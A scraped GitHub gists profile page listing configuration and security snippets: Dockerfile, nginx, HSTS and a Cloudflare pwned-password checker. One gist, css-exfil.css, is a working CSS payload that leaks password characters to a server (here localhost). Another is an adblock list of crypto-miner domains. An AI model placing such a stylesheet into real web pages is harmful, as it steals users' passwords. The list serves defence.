Skip to content

Instantly share code, notes, and snippets.

Hasan Tayyar BEŞİK hasantayyar

Block or report user

Report or block hasantayyar

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@hasantayyar
hasantayyar / Dockerfile
Created Apr 25, 2018 — forked from ju2wheels/Dockerfile
Docker Dockerfile reference template
View Dockerfile
# Last updated: 08/24/2916
#
# Total instructions available: 18
#
# https://docs.docker.com/engine/reference/builder/
#
# You can use a .dockerignore file in the same context directory as
# your Dockerfile to ignore files in the context before sending them
# to the Docker daemon for building to speed up building.
@hasantayyar
hasantayyar / pwnd.js
Created Feb 27, 2018 — forked from jgrahamc/pwnd.js
Cloudflare Workers that adds an "Cf-Password-Pwnd" header to a POST request indicating whether the 'password' field appears in Troy Hunt's database of pwned passwords.
View pwnd.js
addEventListener('fetch', event => {
event.respondWith(fetchAndCheckPassword(event.request))
})
async function fetchAndCheckPassword(req) {
if (req.method == "POST") {
try {
const post = await req.formData();
const pwd = post.get('password')
const enc = new TextEncoder("utf-8").encode(pwd)
View css-exfil.css
input[type="password"][value$=" "] { background-image: url("http://localhost:3000/+"); }
input[type="password"][value$="!"] { background-image: url("http://localhost:3000/%21"); }
input[type="password"][value$="\""] { background-image: url("http://localhost:3000/%22"); }
input[type="password"][value$="#"] { background-image: url("http://localhost:3000/%23"); }
input[type="password"][value$="$"] { background-image: url("http://localhost:3000/%24"); }
input[type="password"][value$="%"] { background-image: url("http://localhost:3000/%25"); }
input[type="password"][value$="&"] { background-image: url("http://localhost:3000/%26"); }
input[type="password"][value$="'"] { background-image: url("http://localhost:3000/%27"); }
input[type="password"][value$="("] { background-image: url("http://localhost:3000/%28"); }
input[type="password"][value$=")"] { background-image: url("http://localhost:3000/%29"); }
View nginx-cors.conf
map $http_origin $allow_origin {
default "$http_origin";
}
map $request_method $cors_method {
default "allowed";
"OPTIONS" "preflight";
}
map $cors_method $cors_max_age {
View nginx-cors.conf
map $http_origin $allow_origin {
default "$http_origin";
}
map $request_method $cors_method {
default "allowed";
"OPTIONS" "preflight";
}
map $cors_method $cors_max_age {
@hasantayyar
hasantayyar / ec2_usernames.md
Last active Jan 2, 2018
aws ec2 default usernames
View ec2_usernames.md
OS/Distro Official AMI ssh Username Legacy / Community / Other AMI ssh Usernames
Amazon Linux ec2-user
Ubuntu ubuntu root
Debian admin root
RHEL 6.4 and later ec2-user
RHEL 6.3 and earlier root
Fedora fedora ec2-user, root
Centos centos root
SUSE root
@hasantayyar
hasantayyar / filter.miners.txt
Created Dec 31, 2017
adblock filter for web miners
View filter.miners.txt
||coinhive.com/lib/*
||cryptoloot.pro/lib/*
||cdn.inwemo.com/*
||coin-have.com/c/*
||load.jsecoin.com/load/*
||minero.cc/lib/*
||ppoi.org/lib/*
||webmine.cz/*
@hasantayyar
hasantayyar / nginx.conf
Created Dec 5, 2017 — forked from plentz/nginx.conf
Best nginx configuration for improved security(and performance). Complete blog post here http://tautt.com/best-nginx-configuration-for-security/
View nginx.conf
# to generate your dhparam.pem file, run in the terminal
openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048
View CloudFlare_HSTS_Note.md

What is HTTP Strict Transport Security?

HTTP Strict Transport Security (HSTS, RFC 6797) is a header which allows a website to specify and enforce security policy in client web browsers. This policy enforcement protects secure websites from downgrade attacks, SSL stripping, and cookie hijacking. It allows a web server to declare a policy that browsers will only connect using secure HTTPS connections, and ensures end users do not “click through” critical security warnings.

HSTS is an important security mechanism for high security websites. HSTS headers are only respected when served over HTTPS connections, not HTTP.

HSTS generally has the following behavior in user web browsers:

  • Insecure HTTP links become secure HTTPS links
  • SSL certificate warnings or other errors show an error message and cannot be bypassed by the user
@hasantayyar
hasantayyar / .env
Created Oct 11, 2017 — forked from lukewduncan/.env
AWS Lambda function for Mailchimp list subscription
View .env
API_KEY='xxxxxxxxxxxxxxxxxxx-us1'
LIST_ID=12033101ax
You can’t perform that action at this time.